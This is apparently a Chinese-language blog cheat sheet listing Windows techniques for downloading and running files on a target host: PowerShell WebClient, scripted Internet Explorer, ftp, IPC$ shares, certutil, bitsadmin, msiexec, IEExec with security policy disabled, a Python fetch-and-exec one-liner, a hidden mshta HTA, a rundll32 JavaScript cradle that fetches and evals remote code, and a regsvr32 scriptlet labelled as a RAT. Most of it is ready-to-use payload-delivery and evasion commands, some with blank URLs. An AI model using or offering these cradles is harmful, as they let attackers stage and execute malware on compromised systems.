win2003、winXP不撑持
$client = new-object System.Net.WebClient $client.DownloadFile(‘’, ‘E:\file.tar.gz’)通过IE下载文件
$ie = New-Object -Com internetExplorer.Application $ie.Navigate("https://site.com/somefile") #------------------------------ #Wait for Download Dialog box to pop up Sleep 5 while($ie.Busy){Sleep 1} #------------------------------ #Hit "S" on the keyboard to hit the "Save" button on the download box $obj = new-object -com WScript.Shell $obj.AppActivate(‘Internet Explorer‘) $obj.SendKeys(‘s‘) #Hit "Enter" to save the file $obj.SendKeys(‘{Enter}‘) #Closes IE Downloads window $obj.SendKeys(‘{TAB}‘) $obj.SendKeys(‘{TAB}‘) $obj.SendKeys(‘{TAB}‘) $obj.SendKeys(‘{Enter}‘) 0x01 ftpftp 192.168.3.2
输入用户名和暗码后
lcd E:\file # 进入E盘下的file目录
cd www # 进入处事器上的www目录
get access.log # 将处事器上的access.log下载到E:\file
可以参考:https://baike.baidu.com/item/ftp/13839
0x02 IPC$ copy \\192.168.3.1\c$\test.exe E:\file 0x03 Certutil可以参考:https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx
应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
certutil.exe -urlcache -split -f file.txt 0x04 bitsadmin可以参考:https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx
1、bitsadmin /rawreturn /transfer getfile E:\file\test.txt 2、bitsadmin /rawreturn /transfer getpayload E:\file\test.txt 0x05 msiexec msiexec /q /i 0x06 IEExec C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec 0x07 python C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘’).read();” 0x08 mshta mshtarun.hta 内容如下:
<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <HEAD> <script language="VBScript"> Window.ReSizeTo 0, 0 Window.moveTo -2000,-2000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "cmd.exe /c net user" // 这里填写命令 self.close </script> <body> demo </body> </HEAD> </HTML> 0x09 rundll32 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%其实还是依赖于WScript.shell这个组件
0x10 regsvr32 regsvr32 /u /s /i: scrobj.dlltest.data内容:
<?XML version="1.0"?> <scriptlet> <registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" > <!-- Learn from Casey Smith @subTee --> <script language="JScript"> <![CDATA[ ps = "cmd.exe /c calc.exe"; new ActiveXObject("WScript.Shell").Run(ps,0,true); ]]> </script> </registration> </scriptlet>还可以操作 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet - requires a webserver to stage the payload)
regsvr32 /u /s /i: scrobj.dll ,